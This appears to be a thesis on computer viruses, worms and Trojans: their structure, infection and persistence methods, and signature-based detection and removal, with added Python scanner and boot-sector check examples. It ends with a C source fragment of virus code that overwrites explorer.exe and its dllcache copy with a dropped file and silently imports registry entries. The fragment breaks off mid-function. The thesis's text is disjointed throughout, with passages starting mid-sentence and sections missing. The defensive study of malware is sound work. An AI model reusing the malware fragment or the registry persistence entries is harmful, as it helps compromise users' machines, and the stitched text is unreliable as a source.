Introduction
Computer viruses today are a source of anxiety for those who work in computing and a source of fear for users whose machines become infected. When their computer is infected, users can only rely on the anti-virus software available on the market; if that software fails to detect or remove the virus, they are left in a very difficult position, not knowing what to do. For that reason, a basic understanding of the structure, mechanisms and operating principles of computer viruses is necessary. On that basis one can take a sound view of computer viruses in prevention, checking and disinfection, as well as in analysing and studying a newly appeared virus. Each operating system has its own kinds of virus that run on it: DOS has DOS viruses, Windows has Windows viruses. The development of computing is tied to the development of computer viruses: whenever a new piece of software, program or operating system appears, new viruses appear with it, followed in turn by anti-virus programs. Research into recognising and detecting viruses is therefore needed so that suitable measures can be taken to block and eliminate them with the best results.
Acknowledgements
I would like to express my deep respect and gratitude to Assoc. Prof. Dr. Trịnh Nhật Tiến and the lecturers of the Faculty of Information Technology, Haiphong Private University, who guided and encouraged me during the writing of this thesis. I thank the teachers of the university for creating the conditions that helped me complete it. I also thank my family and friends for their help, encouragement and support during this work. As time was limited and my experience is still modest, shortcomings are unavoidable. I look forward to receiving comments from the teachers and my friends. My sincere thanks.
1.1. INTRODUCTION TO COMPUTER VIRUSES
1.1.1. Computer viruses and their properties
1.1.1.1. Concept
... which means the virus must keep its complexity down, making it easy for programmers to analyse its code. Destructiveness: some kinds of virus lack this property, simply because they were written for amusement or to test how well they spread. Many kinds of virus, however, are highly destructive.
As for DoS (Denial of Service) viruses: these spread everywhere and lie dormant wherever they have infected. Finally they all attack at once in denial-of-service fashion (continuous requests from many computers simultaneously, so that the targeted servers can no longer serve and end up refusing new requests) against server systems, either when their operator gives the command or at a predetermined moment. A telephone system in Spain was the first target attacked.
Disagreement over the names and naming conventions for viruses creates confusion in this field, which in turn hampers countermeasures and helps viruses spread. This was also a topic for discussion at the global anti-virus conference (Virus Bulletin 2003) held in Toronto, Canada at the end of September 2003. In the early 1990s a naming convention was proposed by the Computer Antivirus Research Organization (CARO). Formally introduced in 1991 and occasionally extended since, it lays down rules on what may and may not be used when naming a virus, and establishes a set of virus characteristics such as its danger level, the platform it affects and the damage it does. Nick Fitzgerald, representing CARO, said when speaking about the current naming scheme that their rules remain in force. A technical naming style matters to virus specialists, who can tell from the name which family a virus belongs to and which variant it is. That matters little to most computer users, who tend to remember virus names such as I Love You and Melissa (names taken from events) rather than VBS.LoveLetter.A and W97.Mellisa.A. In short: disagreement over virus naming among researchers and security software companies gives the same virus many different names. This confuses people, but anti-virus software only looks at the characteristics and identifying signs of a virus, never its name, when removing it.
The method just described is exactly the one computer Trojans use. First the attacker somehow tricks the victim into running their program. When this program runs it looks outwardly like any normal program. In parallel, however, part of the Trojan quietly installs itself on the victim's machine. At some predetermined moment this program deletes data, or sends the information the attacker wants to a pre-arranged address on the network. Unlike a virus, a Trojan is a piece of program code with no ability to spread at all. It is installed only when activated, and reaches another computer only when someone sends it there, whereas a virus actively seeks out victims to infect. Software carrying a Trojan is usually distributed as a utility or as attractive new software in order to draw users in. Besides the traditional information-stealing Trojans, some newer terms are used for Trojans with particular characteristics:
BackDoor: a Trojan which, once installed on the victim's machine, opens a service port that lets the attacker (hacker) connect remotely to the victim's machine, from which it receives and executes the attacker's commands.
Illegitimate advertising software (Adware) and spyware (Spyware): these annoy the user by deliberately changing the browser's default home page and default search page, or by continually popping up advertising pages while the user is browsing. They usually slip onto the machine when the user inadvertently visits unwholesome websites or software-cracking sites, or come bundled with untrustworthy free software or cracked software (cracks, keygens).
The concept of an Internet worm also covers viruses that spread over peer-to-peer file-sharing networks, viruses that spread through chat services and, in particular, viruses that exploit software vulnerabilities to spread. Software (above all operating systems and the services running on them) always contains latent bugs (for example buffer overflows) that are not always easy to discover. Once a software vulnerability is found, viruses able to exploit it soon appear, infecting remote computers silently, without the owner's knowledge. From these machines the worm goes on to jump to other computers on the Internet in the same way. Classifying viruses gives us a correct view of computer viruses, from which effective methods of blocking them can be built.
The key problem this kind of virus must solve is the old Boot sector (Master Boot sector) of the disk. The virus replaces it with a new Boot sector, but it cannot do all the work of the old Boot sector (Master Boot sector), because that sector holds information about the disk and the virus cannot really know in full what the sector has to do. For this reason most B-Viruses do not discard the old Boot sector: the virus stores it somewhere on the disk and, once its own installation is finished, reads it back and hands control to the code in that sector (some viruses, however, write their own code over the code of the old Boot sector, keeping only the disk information, without hiding the sector away). Everything then proceeds normally, as though the old Boot sector were still in place. Choosing where to hide the old Boot sector is itself difficult, however, because every area of the disk may be modified: the FAT, the Root Directory and especially the Data area. Based on how they solve the problem of hiding the old Boot sector, B-Viruses can be divided into two kinds: SB-Viruses and DB-Viruses.
1/. SB-Virus
Because they accept possible data loss, the program is compact and occupies only one sector. SB-Viruses usually pick the places least likely to be overwritten to hide the old Boot sector. For floppy disks the usual choices are:
- The last sectors of the Root Directory, since users rarely use up all the entries of the root directory.
- The last sectors of the disk, since when allocating clusters to a file DOS starts looking for free clusters from the beginning of the data area, based on the entries in the FAT.
For hard disks it is simpler: on most disks track 0 holds only the Master Boot record in one sector, and the remaining sectors of that track are empty and unused. Therefore SB-Viruses, and most DB-Viruses too, choose the empty sectors on this track as their hiding place.
2/. DB-Virus
- For most viruses, 512 bytes (the usual size of a sector) is not enough room. They therefore replace the old Boot sector with a fake Boot sector whose job is to load the rest of the virus code from the disk into memory and hand over control. Only after that part has been installed is the real Boot sector loaded into memory. The remaining virus code may lie in one of the following places:
- On floppy disks: bypass DOS by using free clusters; the FAT entries corresponding to these clusters are marked bad so that DOS will no longer use them. The second method, which has the advantage of escaping DOS's supervision entirely, is to add a new track after the last track DOS can manage (this applies only to floppies). Its drawback is that some floppy drives cannot handle the extra track, so the new track causes errors when the virus tries to spread. For this reason the first method is still the one viruses use more often.
- On hard disks: the virus code may be stored in the sectors after the Master Boot record, or in the last sectors of the partition after the partition has been shrunk, or handled as on floppies (using free clusters and marking them bad in the FAT so that DOS does not use them). In general the program structure of an SB-Virus and a DB-Virus is the same.
Initialisation part
First the virus becomes resident by copying itself into high memory. Then, to ensure it can pop up, it always hooks interrupt 13h. In addition, for sabotage and interference, the virus may also hook interrupts 8 and 9. Once initialisation is complete, the old Boot sector is returned to its proper place and given control.
Body part
This is the important part of the virus, holding the code that for the most part replaces the interrupts it has hooked. It can be divided into four parts.
+ Spreading part: the main part of the virus body, replacing interrupt 13h; it spreads by copying itself onto any disk not yet infected.
+ Interference and camouflage part: once the nature of a virus has been thoroughly examined, detecting and removing it is no longer complicated. Interference makes it harder for anti-virus workers to find and remove the virus and to recover data. Camouflage makes the virus look normal from the outside so that neither virus fighters nor users notice it.
+ Destructive part: not necessarily present, but most viruses have one, ranging from displaying jokes and taunting the user to destroying the data on the machine. The virus may do damage at random or on a timer. A timed virus checks a value (it may look at the day, hour, month, year, number of infections or hours the machine has run); when that value equals or exceeds the allowed threshold, it begins its damage.
+ Data part: holds intermediate information, internal variables used by the virus, and the old Boot sector.
1/. Prepending
This method is usually applied only to .COM files, that is, programs whose entry point is always PSP:100h. Exploiting this, the virus inserts its code at the head of the infected file and pushes the whole file down to just after itself. Advantage: the virus code is easy to write and has the form of a .COM file. It also makes recovery harder for the disinfector, who must read the whole infected file into memory and then write it back. Disadvantage: before returning control to the file, the entry point must be at PSP:100h, so the whole program must be moved to that address.
2/. Appending
This method is seen in most F-Viruses and its range of infection is wider than the method above. As its name says, the virus is attached right after the infected file. Because the virus code is not at the program's entry point, it relocates itself within the infected file by changing some of the file's data so that the entry point points into its code. Advantage: it can spread to every kind of executable file, usually .COM, .EXE, .BIN and .OVL; the changes to the infected file are small and seizing control is not difficult. Disadvantage: it is easy for the disinfector to recover the data, and the virus code is hard to locate after infection because the size of the infected file is arbitrary.
Destructive part: similar to the B-Virus. Data part: holds intermediate information, internal variables used by the virus and the data of the infected file; this data is restored to the file before control is handed back to it.
2/. RF-Virus:
Because it stays resident and hooks interrupts like a B-Virus, this kind also has two main parts: initialisation and body. Initialisation part: first the virus becomes resident, either by copying itself into memory or by using DOS's terminate-and-stay-resident functions. Then, to ensure it can pop up, it always hooks interrupt 21h. For sabotage and interference it may also hook interrupts 8, 9 and 13h. Once initialisation is done, it restores the original data and returns control to the infected file. Body part: structured like the TF-Virus, with the same four parts: spreading, interference, destruction and data. But because this kind of virus is resident, the spreading part acts on files that request services through interrupt 21h (which the virus has hooked). The interference and camouflage part is also more complex and refined than in a TF-Virus, since it can monitor the system while resident.
Thus, to spread, a macro virus must always have at least one auto-executing macro. This macro contains code that spreads by copying the whole virus code into other files. A macro virus may also have destructive, interference and camouflage parts.
4/. Destructive Trojans:
These Trojans have only one task: to destroy all the files on the computer. Example: CIH. They are very dangerous because once a computer is infected, even a single time, all its data is lost.
1.5.5. Purpose of Trojans
Many people think hackers use Trojans only to damage their machines; that is entirely wrong. A Trojan is a very effective tool that helps its user gather a great deal of information from the victim's computer:
- Credit card information, customer information.
- Account information and confidential data.
- Lists of email addresses and home addresses.
- Account passwords or any information about a company.
Today the concept of a worm has been broadened to include viruses that spread over peer-to-peer networks, over USB drives or through instant messaging (chat) services, and especially viruses that exploit software vulnerabilities to spread. Software (above all operating systems and the services on them) always harbours bugs and security holes, such as buffer overflows, that are not always easy to find. Once a vulnerability is discovered, viruses able to exploit it soon appear, silently infecting remote machines without the owner's knowledge, and from those machines the worm jumps to others on the Internet in the same way. The danger of Internet worms can be seen by studying the MyDoom worm.
Date the first MyDoom worm appeared: 26/01/2004. Date it reached Vietnam: 27/01/2004. The MyDoom attack peaked on 31/01/2004, when millions of MyDoom-infected emails were sent simultaneously to Yahoo's website, clogging it. Firewalls and filters were raised immediately to block and discard all emails with the subjects Test, Hi, Hello, Mail Delivery System, Mail Transaction Failed, Server Report and Status Error, even though these are subjects Yahoo itself commonly uses. Despite the timely defences, from 8:17 to 12:10 on 31/01/2004 Yahoo's site was hit by a DoS (Denial of Service) attack, and typing http://www.mail.yahoo.com/ redirected to http://www.search.com/. Almost all activity on the site was paralysed.
The new variant, called MyDoom.B (also known as Norvarg.A or Mimailk), can block access to the websites of anti-virus vendors. The original MyDoom was written only to create a wave of junk mail and to prepare for a mass attack from 01 to 12/02/2004 on the website of SCO Group Inc. The new variant MyDoom.B adds a command to attack Microsoft's website as well. The MyDoom worm was deliberately written not to attack the email addresses of government agencies, some universities and some computer security vendors, including Symantec. Computers running Microsoft Windows XP are at the greatest risk of infection. According to technology experts, the financial damage from MyDoom, including Internet outages, is estimated in the billions of dollars. Software to remove MyDoom was first updated on 28/01/2004 (by Symantec). 160,000 virus-infected emails were sent to a single company in 60 minutes in the USA. The most ports opened: 71, from port 3127 to port 3198. Symantec counted up to 2,100 different systems on the network scanning for the backdoors MyDoom created. 50,000 computer systems were infected and remotely controlled, a risk for a mass attack. 300 million virus-carrying messages were sent, one twelfth of all email on the Internet over two days. 500,000 computers were infected with MyDoom within 3 days of the worm's discovery. 142 countries were affected.
1.6.2.1. The Morris worm
The Morris worm was the first computer worm distributed over the Internet and the first to attract significant mass-media attention. Its author was Robert Tappan Morris, a student at Cornell University. The Morris worm was released onto the network on 2 November 1988 from MIT; it was launched from MIT to hide the fact that it originated at Cornell. (Robert Tappan Morris is now a professor at MIT.) The critical mistake that turned the worm from a potentially harmless intellectual experiment into a destructive denial-of-service worm was its spreading mechanism. The worm decided whether to invade a new computer by asking whether a copy was already running. Had it done only this, eradicating it would have been too easy: anyone could simply run a process that answers "yes" when asked whether a copy exists, and the worm would stay away. To avoid this, Morris designed the worm to duplicate itself with 40% probability regardless of the result of the infection check. In practice this duplication rate was far too high; the worm spread rapidly and infected some computers many times over. It is estimated that around 6,000 Unix computers were infected by the Morris worm. Paul Graham said: "I was there when this number was cooked up, and the recipe was as follows: someone guessed that there were about 60,000 computers connected to the Internet, and that the worm might have infected 10% of them." The cost of the damage was estimated at 10 to 100 million dollars.
Robert Morris was tried and convicted of violating the 1986 Computer Fraud and Abuse Act. After appeal he was sentenced to 3 years' probation, 400 hours of community service and a fine of 10,050 US dollars. The Morris worm is sometimes called the "Great Worm" because of the severe consequences it had on the Internet of the time, both in total system downtime and in its psychological impact on perceptions of the security and reliability of the Internet.
1.6.2.2. The Kakworm worm
Kakworm (KAV) is a worm. It was built to exploit a vulnerability in the protection of the Internet Explorer browser and the Outlook Express program. A fix for this vulnerability has been released by Microsoft and should be applied immediately (see Microsoft security bulletin MS99-032). Browsers and mail clients other than Microsoft's are not affected. KAV is embedded in the HTML signature of a message. The user does not see it because there is no visible text to display (KAV is written in JavaScript). The user need not click any attachment or take any action to activate KAV; merely viewing the message is enough for the worm to enter the system. Once activated, KAV saves the file KAK.HTA into the Windows startup folder. The next time the computer boots, KAK.HTA runs and creates KAK.HTA in the Windows folder. Once a month, after five o'clock in the afternoon, the KAK worm displays the message "Kagou - Anti - Krosoft says not today" and then shuts down the computer. KAK was built on Bubbleboy, the first worm able to spread without the user opening an attachment.
Media files with the extensions MP2 and MP3 are copied to a new file of the same name with the extension .VBS appended. The worm looks for a mIRC client program and, if it finds one, drops a copy and an HTML file designed to send the worm over mIRC. The original virus file has been very influential: many variants appeared quickly and spread widely. More than 20 variants have been reported, and over time the actual number of variants exceeds the reported number. A few of the most notable:
Subject: fwd:, no body text, attachment: very funy.vbs.
Subject: Mothers Day, body: we have charged your card about 326.92 USD for the special Mothers Day offer. We have attached a detailed order list to this email. Please print out the attachment and keep it in a safe place. Thanks again and have a happy Mothers Day; from mothersday@subdimension.com, attachment: mothersday.vbs.
Subject: virus ALERT !!!, from: support@symatec.com, body: Dear Symantec customer, Symantec's AV research centre began receiving reports concerning VBS.LoveLetter.A virus early on the morning of 4/5/2000 GMT. This worm appears to originate from the Asia Pacific region. Distribution of the virus is widespread and hundreds of thousands of machines are reported infected; attachment: protect.vbs.
Subject: How to protect yourself from the ILOVE bug!, body: here is the way to get rid of the love virus, attachment: Virus-ProtectionIntruction.vbs.
1.6.2.4. The Melissa worm
Melissa is a combination of a macro virus and an email worm. It was first found on Friday, 26 March 1999, and spread around the world very quickly. Basically, when a user clicks the .DOC file attached to the email, the macro virus runs. One of the first things the virus does is compose and send a message to the first 50 addresses in the Outlook address book. The subject is "Important message from <your username>" and the body: "Here is the document you asked about .... (don't show anyone else)". Attached to this message is the document currently being worked on. Since Melissa is a virus and infects the NORMAL.DOC file, it can send out the infected file as though it were something very important from the machine that received it. In the rare case where the minute, hour, day and month coincide (8:08 on 8 August), the virus inserts the text: "Twenty-two, plus triple word score, plus fifty points for using all my letters. Game's over." The initial distribution of Melissa was in a file called LIST.DOC, which contained passwords to X-rated, unwholesome websites.
1.6.2.5. The Nimda worm
Nimda is one of the complex worms, built from borrowed techniques. It infects files, spreads through websites, through email and by exploiting the local network. It infects all versions of Windows from Windows 95 to Windows 2000, as well as Microsoft IIS. Nimda also spreads through poorly secured websites, so that browsers become infected merely by viewing a web page. Finally, Nimda is the first worm to use the user's computer to scan the local network for vulnerable machines behind the firewall that it can attack (previously only worms that spread via servers did this). Nimda uses several well-known weaknesses in Microsoft IIS servers. Some of them are described at:
http://www.microsoft.com/tech/security/bulletin/ms00-078.asp
http://www.microsoft.com/tech/security/bulletin/ms01-020.asp
The Nimda worm uses the following methods to spread:
- From client to client via email and by infecting .EXE files.
- From client to client via local network shares.
- From web server to client via the browser, through websites.
- From client to web server by actively scanning for and exploiting the Microsoft IIS 4.0/5.0 directory traversal vulnerability.
- From client to web server by scanning for the backdoors left behind by the Code Red II and sadmind/IIS worms.
Nimda on the victim's computer. Nimda usually appears as a README.EXE attachment to an email, but it may appear as anything else. The .EXE file carries more than 50 characteristics in its original base file. If run, it first copies itself to a temporary folder under a random name of the form MEP*.TMP (where * stands for random characters). Then, from that folder, it executes itself with the command-line option -dontrunold. Using arithmetic operations the worm determines whether it can delete the file (in the temporary folder). If it can, the worm builds its primary infection tool: a MIME-encoded copy of itself that can be attached to multipart messages. These new worm copies are given a random name and stored in a temporary folder. Now it is ready to carry out its work. Finally, the worm copies itself to RICHED20.DLL in the Windows\System folder and gives the file the hidden and system attributes. When executed, Nimda searches for shared network resources and begins scanning the shared files. It looks for files with the .DOC and .EML extensions; when they are found, RICHED20.DLL is copied into their folder so that it runs when an OLE component is loaded on the remote machine, which then triggers infection of that machine. Some copies of the worm do the following: it modifies the key [Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] so that hidden files are no longer visible, concealing the worm in Explorer. It creates a Guest account on the infected system and adds the Administrator and Guest accounts to the special group. Using this it creates a share "c:\" with full special access rights. It deletes the subkeys of [SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security], the effect of which is to disable share security.
Chapter 2. RECOGNISING AND DETECTING VIRUSES
2.1. VIRUS RECOGNITION TECHNIQUES
2.1.1. Exact pattern recognition (Signature-based detection)
This is the exact identification of viruses for which the Anti-Virus (AV) program already holds a sample. The technique can be described simply: the files to be checked are analysed and compared with known virus patterns; if a virus code fragment is found, the file may be infected and the software removes the virus from it. Exact pattern recognition forces the software to update its database continually in order to recognise new viruses and their variants. All anti-virus software uses this technique to scan for viruses; the more recognition codes an AV holds, the better its removal capability. All other recognition techniques were developed to make up for the shortcomings of this one.
+ Advantages of exact pattern recognition: high recognition accuracy with few false positives, and better removal results. The relative (heuristic) techniques only allow a file to be suspected of being a virus; exact recognition allows the symptoms accompanying a virus to be removed and the system restored.
+ Disadvantages of exact pattern recognition: its greatest weakness is that it cannot cope with new or not yet seen viruses for which no sample exists. The database of virus patterns is large, which makes the anti-virus software large. The technique requires continuous database updates, costing time, money and effort.
+ Disadvantage: this kind of scan is rather helpless against a virus family. For example, if one inserts or deletes a byte in the virus's binary file (keeping the virus runnable) and that byte lies before the signature offset, this method will inevitably fail to recognise the modified virus pattern.
Strings of the 2 virus samples
We will have 2 corresponding strings but at 2 different offsets (from now on, whenever strings from a binary file are mentioned, I will write them as sequences of hexadecimal numbers for easier reading):
Looking at the 2 tables above, we can create a common recognition code for both viruses:
String: 64 75 6E 67 63 6F 69 00
Offset: Entry Point address + 60
+ Advantage: extending the signature this way widens the range of viruses recognised. For example, if some bytes are modified as above but the Entry point position is unchanged and the original bytes still exist after it, the virus can still be recognised by a signature updated in this way.
+ Disadvantage: the update requires more information than the static-offset method, and the scan engine needs a more complex mechanism to support this scanning mode. Because this method derives the offset from information in a suitable file format, it is limited to certain file formats.
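The entry-relative signature above, as an added example in Python (not code from the thesis or its scanner): the scanner parses a PE32 header to turn AddressOfEntryPoint into a file offset, treats a flat .COM-style file as having its entry point at byte 0, and reports a match when the string 64 75 6E 67 63 6F 69 00 sits at entry + 60; a fixed-offset check is included for the contrast the text draws, and the PE images used as input are constructed in the block. The family name demo.family is a placeholder.

```python
import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class Signature:
    """A recognition code: a byte string expected at a fixed distance from the entry point."""
    name: str
    pattern: bytes
    entry_offset: int


# The common signature derived in the text: string 64 75 6E 67 63 6F 69 00 at Entry Point + 60.
# "demo.family" is a placeholder family name, not a name from the thesis.
SIGNATURES = [Signature("demo.family", bytes.fromhex("64756E67636F6900"), 60)]


def pe_entry_file_offset(data: bytes):
    """Map AddressOfEntryPoint (an RVA) of a PE32 image to a file offset.
    Returns None when data is not a PE image or the entry point lies in no section."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    first_section = opt + size_of_opt
    for i in range(num_sections):
        hdr = first_section + 40 * i
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, hdr + 8)
        if vaddr <= entry_rva < vaddr + max(vsize, raw_size):
            return raw_ptr + (entry_rva - vaddr)
    return None


def entry_file_offset(data: bytes) -> int:
    """Entry point as a file offset. For a flat .COM-style file (loaded at PSP:100h)
    the entry point is the first byte of the file."""
    off = pe_entry_file_offset(data)
    return 0 if off is None else off


def scan(data: bytes, signatures=SIGNATURES):
    """Entry-relative scan: report every signature whose pattern sits at entry + offset."""
    entry = entry_file_offset(data)
    hits = []
    for sig in signatures:
        pos = entry + sig.entry_offset
        if data[pos:pos + len(sig.pattern)] == sig.pattern:
            hits.append(sig.name)
    return hits


def scan_fixed(data: bytes, sig: Signature, file_offset: int) -> bool:
    """The static-offset variant the text contrasts with: pattern at an absolute file offset."""
    return data[file_offset:file_offset + len(sig.pattern)] == sig.pattern


def build_sample_pe(code: bytes, raw_ptr: int = 0x200) -> bytes:
    """Constructed minimal PE32 image with one .text section at RVA 0x1000 whose raw data
    starts at raw_ptr; the entry point is the first byte of the section. Test data only."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # i386, 1 section, PE32 opt hdr
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                         # AddressOfEntryPoint
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000,
                       len(code), raw_ptr, 0, 0, 0, 0, 0x60000020)
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect
    return header.ljust(raw_ptr, b"\0") + code


if __name__ == "__main__":
    pattern = SIGNATURES[0].pattern
    code = b"\x90" * 60 + pattern + b"\xC3"        # 60 filler bytes, then the signature string
    normal = build_sample_pe(code)
    shifted = build_sample_pe(code, raw_ptr=0x300)  # same code, section moved within the file
    print("entry-relative:", scan(normal), scan(shifted))
    print("fixed offset  :", scan_fixed(normal, SIGNATURES[0], 0x200 + 60),
          scan_fixed(shifted, SIGNATURES[0], 0x200 + 60))
```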
Anti-virus software usually allows this function to be switched on or off and its level to be chosen (aggressive, the basic medium level, or low; the default setting is usually the basic level), because most such functions consume resources and slow down weaker computers.
1/. For B-Viruses:
Compare the total memory reported by the BIOS with the total memory the program itself measures, to check for a discrepancy. A memory discrepancy alone is not enough to conclude that a virus exists; it is the basis for step two, since the difference may also be caused by a normal program or by partly faulty RAM. Starting from the address of the high memory area, search with the scanning technique: look for the virus's characteristic code in high memory. Any find allows the conclusion that a virus is in memory. If nothing is found, a new B-virus may still exist. If memory is found to be short, interrupt 13h points into the missing area and that area contains dangerous code, one can conclude that a B-Virus is present.
2/. For RF-Viruses:
One can use the scanning technique to look for the virus's characteristic code from low to high addresses, or use the method of calling the recognition interrupt that the viruses themselves install in order to recognise themselves in memory. If nothing is found, a new RF-Virus may still exist. If interrupt 21h points into an area of memory containing dangerous code, the conclusion that a new RF-Virus exists is fairly accurate.
Searching the disk
Searching the disk must be done after checking that memory is free of viruses, or that any present have been contained. Like most other anti-virus programs, this program also scans for characteristic code fragments to detect viruses. First the Boot area is scanned for B-Viruses, then files are scanned for F-Viruses, Trojans and Worms. To scan the Boot area, the read-sector function 02h of BIOS interrupt 13h reads it into a buffer, which is then scanned for characteristic virus code. To scan files, the file access functions of interrupt 21h are used: open file (function 3Dh), then read file (function 3Fh) into a buffer, which is likewise scanned for virus code.
3.2.1. B-Virus
Many people think that removing the virus and restoring the disk is simply a matter of writing a clean Boot sector over the infected one. However, if the disk's Boot sector has special duties this is very hard; moreover the disk has a parameter table that, if corrupted by the virus even slightly, can leave the disk uncontrollable (the simple approach is reasonable only if the clean Boot sector is the disk's own Boot sector saved beforehand). Therefore the best way is to restore the original Boot sector, and only if it cannot be restored to write a clean Boot sector. The steps are: based on the disk type (hard or floppy) and the virus type, decode to determine where the original Boot sector is stored; read the original Boot sector into a buffer with BIOS interrupt 13h (read-sector function 02h) and check its validity; only if that check passes, write it over the infected Boot sector with the write-sector function 03h of BIOS interrupt 13h. For DB-Viruses, restoring the disk may also require freeing clusters that were marked bad on the disk, if the virus used the FAT method. The best approach here is: do what the virus did, but in reverse.
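A validity check of the kind the restore step calls for, as an added example in Python that is not the thesis's program: before the recovered Boot sector is written back with function 03h, its BIOS Parameter Block fields and 55 AA signature are checked for plausibility. The floppy Boot sector used as input is constructed in the block, and the set of fields checked is my own choice.

```python
import struct

BOOT_SIGNATURE = b"\x55\xAA"


def boot_sector_is_plausible(sector: bytes):
    """Sanity-check a recovered DOS/FAT Boot sector before writing it back.
    Returns (ok, list of problems found). The fields checked are the writer's choice."""
    problems = []
    if len(sector) != 512:
        return False, ["sector is not 512 bytes"]
    # A DOS Boot sector starts with a jump into its loader code: EB xx 90 or E9 xx xx.
    if not ((sector[0] == 0xEB and sector[2] == 0x90) or sector[0] == 0xE9):
        problems.append("no jump instruction at offset 0")
    # BIOS Parameter Block, offsets 11..23 of the sector.
    (bps, spc, reserved, fats, root_entries, total16,
     media, spf) = struct.unpack_from("<HBHBHHBH", sector, 11)
    total32 = struct.unpack_from("<I", sector, 32)[0]
    if bps not in (512, 1024, 2048, 4096):
        problems.append(f"bytes per sector {bps} is not valid")
    if spc == 0 or spc & (spc - 1):
        problems.append(f"sectors per cluster {spc} is not a power of two")
    if reserved == 0:
        problems.append("reserved sector count is zero")
    if fats not in (1, 2):
        problems.append(f"FAT count {fats} is not 1 or 2")
    if media < 0xF0:
        problems.append(f"media descriptor 0x{media:02X} is not a known value")
    if total16 == 0 and total32 == 0:
        problems.append("total sector count is zero")
    if sector[510:512] != BOOT_SIGNATURE:
        problems.append("missing 55 AA boot signature")
    return not problems, problems


def make_sample_boot_sector(corrupt: bool = False) -> bytes:
    """Constructed 1.44 MB FAT12 floppy Boot sector (test data, not a real disk image).
    With corrupt=True the bytes-per-sector field is zeroed, the kind of damage to the
    parameter table the text warns about."""
    sec = bytearray(512)
    sec[0:3] = b"\xEB\x3C\x90"
    sec[3:11] = b"MSDOS5.0"
    # bytes/sector, sectors/cluster, reserved, FATs, root entries, total sectors, media, sectors/FAT
    struct.pack_into("<HBHBHHBH", sec, 11, 512, 1, 1, 2, 224, 2880, 0xF0, 9)
    struct.pack_into("<HHII", sec, 24, 18, 2, 0, 0)   # sectors/track, heads, hidden, total32
    sec[510:512] = BOOT_SIGNATURE
    if corrupt:
        struct.pack_into("<H", sec, 11, 0)
    return bytes(sec)


if __name__ == "__main__":
    print(boot_sector_is_plausible(make_sample_boot_sector()))
    print(boot_sector_is_plausible(make_sample_boot_sector(corrupt=True)))
```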
Creating keys in the Registry:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] Trojan=c:\Trojan.exe
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce] Trojan=c:\...\Trojan.exe
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] Trojan=c:\...\Trojan.exe
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] Trojan=c:\...\Trojan.exe
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] Trojan=c:\...\Trojan.exe
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices] Trojan=c:\...\Trojan.exe
- In the Registry's shell open commands, with the key value %1 %*:
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
[HKEY_CLASSES_ROOT\comfile\shell\open\command]
[HKEY_CLASSES_ROOT\batfile\shell\open\command]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]
Trojan.exe = %1 %*
- In some applications that allow certain programs to be run:
+ In ICQ: [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]
+ In ActiveX: [HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName] StubPath=c:\...\Trojan.exe
To remove a Trojan, delete every entry that would run the Trojan's file when the computer starts (in this example, the file Trojan.exe).
3.2.4. Worms
To remove an Internet worm, carry out the following steps in order:
- Study the information about the worm.
- Remove the infecting part from the infected files.
Each Internet worm has its own characteristics, so it is necessary to study it: the name of its executable file, the path of the executable, its effects on other files in the system, the files it creates and the representative code of each Internet worm. Using the worm's representative code we can scan files to find and remove it.
/*=================================================*/
int copy(char *infile,char *outfile)
{
  FILE *input,*output;
  char temp;
  if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen(outfile,"wb"))!=NULL))
  {
    while(!feof(input))
    {
      fread(&temp,1,1,input);
      fwrite(&temp,1,1,output);
    }
    fclose(input);
    fclose(output);
    return 0;
  }
  else return 1;
}
/*=================================================*/
int autorun_explorer()
{
  FILE *input;
  if((input=fopen("C:\\windows\\system\\explorer.exe","rb"))!=NULL)
  {
    fclose(input);
    remove("C:\\windows\\$temp$");
    remove("C:\\windows\\system32\\dllcache\\$temp$");
    return 1;
  }
  copy("C:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");
  rename("C:\\windows\\explorer.exe","C:\\windows\\$temp$");
  rename("C:\\windows\\system32\\dllcache\\explorer.exe","C:\\windows\\system32\\dllcache\\$temp$");
  if(copy("SVCHOST.com","C:\\windows\\explorer.exe")==0 && copy("SVCHOST.com","C:\\windows\\system32\\dllcache\\explorer.exe")==0)
    return 0;
  else return 2;
}
/*=================================================*/
int add_reg()
{
  FILE *output;
  if((output=fopen("$$$$$","w"))!=NULL)
  {
    fprintf(output,regadd);
    fclose(output);
    spawnl(1,"C:\\windows\\regedit.exe"," /s $$$$$",NULL);
    return 0;
  }
  return 1;
}
/*=================================================*/
void copy_virus()
{
  int i,k;
  FILE *input,*output;
  char *files_svchost[SVCHOST_NUM]={"svchost.com","C:\\windows\\wjview32.com","c:\\windows\\system\\MSMOUSE.DLL","c:\\windows\\system32\\cmdsys.sys","C:\\windows\\system32\\mstsc32.exe","c:\\windows\\explorer.exe"};
